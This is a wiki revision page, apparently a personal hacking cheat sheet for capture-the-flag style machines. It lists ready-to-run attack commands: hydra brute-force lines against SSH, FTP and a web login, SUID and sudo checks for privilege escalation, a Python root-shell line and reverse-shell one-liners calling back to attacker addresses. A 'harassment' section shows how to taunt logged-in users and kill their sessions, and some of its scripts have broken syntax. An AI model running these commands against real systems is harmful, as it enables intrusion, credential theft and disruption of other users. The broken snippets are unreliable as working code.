Difference between revisions of "Enumeration"

From Void-Byte
Jump to navigation Jump to search
Line 119: Line 119:
 
<br />
 
<br />
  
====== === FTP === ======
+
======<nowiki>=== FTP ===</nowiki>======
 
If port 21 is open attempt to sign-in with anonymous (with randomized password).
 
If port 21 is open attempt to sign-in with anonymous (with randomized password).
  
 
If you can sign-in with anonymous (or other users) see if you can '''GET''' or '''PUT''' (don't forget to set lcd with 'lcd /usr/home/Downloads)
 
If you can sign-in with anonymous (or other users) see if you can '''GET''' or '''PUT''' (don't forget to set lcd with 'lcd /usr/home/Downloads)
<br />
+
 
 +
You can also check for hidden files with 'ls -alh'.<br />

Revision as of 21:50, 11 November 2020

NMAP the IP address, and perform servide scan.

GOBUSTER each IP address and port.

HASH-IDENTIFIER any hashes found.

!! IF ACCESS GAINED !!

CHECK /etc/password

CHECK /etc/crontab

*** STEGONAGRAPHY ***

steghide extract -sf <filename>

stegcrack <filename> <wordlist>

ffuf -w /usr/share/wordlists/common.txt -u http://0.0.0.0/FUZZ -t 120

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.210.9/hidden

nmap -sS -A 10.10.210.9

hydra -L /home/user/hackerlist.txt -P /usr/share/wordlists/passlist.txt 10.10.210.9 ssh

hydra -L /home/user/hackerlist.txt -P /usr/share/wordlists/rockyou.txt ftp://10.10.210.9

hydra -L /home/user/hackerlist.txt -P /usr/share/wordlists/passlist.txt 10.10.210.9 http-post-form "/api/user/login:username=^USER^&password=^PASS^:F=incorrect" -V

linpeas if access to linux machine

***

ALWAYS TRY TO RUN 'sudo -l'

For every user: find / -type f -perm -u=s 2>/dev/null; getcap -r / 2>/dev/null

/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

****

***

ALWAYS 'sudo -l' IF YOU GAIN ACCESS

SEE IF YOU CAN FIND /BIN/BASH or /BIN/SH for ESCALATION WITH "NOPASSSWD"

***

***

REVERSE SHELLS

php -r $sock=fsockopen(“192.168.0.195”,4444);exec(“/bin/sh -i <&3 >&3 2>&3”);’

bash -i >& /dev/tcp/0.0.0.0/1234 0>&1

***

***

SHOW ALL OTHER CONNECTIONS

netstat -natp

***

** HARASSMENT **

There's probably an easier way, but I do this:

See who's logged into your machine -- use who or w:

> who  

mmrozek  tty1         Aug 17 10:03  

mmrozek  pts/3        Aug 17 10:09 (:pts/2:S.0)

Look up the process ID of the shell their TTY is connected to:

> ps t  

PID   TTY      STAT   TIME COMMAND  

30737 pts/3    Ss     0:00 zsh

Laugh at their impending disconnection (this step is optional, but encouraged)

> echo "HAHAHAHAHAHAHAHA" | write mmrozek pts/3

Kill the corresponding process:

> kill -9 30737

HARASSMENT SCRIPT

#!/bin/bash/

while True   

Do

  echo '' | write username pta/?

Done

*** ONE LINER REVERSE SHELLS ***

https://github.com/infosec-au/fuzzdb/blob/master/attack-payloads/os-cmd-execution/reverse-shell-one-liners.doc.txt

**SHOW IPS ON MACHIINE***

netstat -natlp

(kick them off with [kill -9 PID] after finding PID with [netstat -np | grep PORT])


=== FTP ===

If port 21 is open attempt to sign-in with anonymous (with randomized password).

If you can sign-in with anonymous (or other users) see if you can GET or PUT (don't forget to set lcd with 'lcd /usr/home/Downloads)

You can also check for hidden files with 'ls -alh'.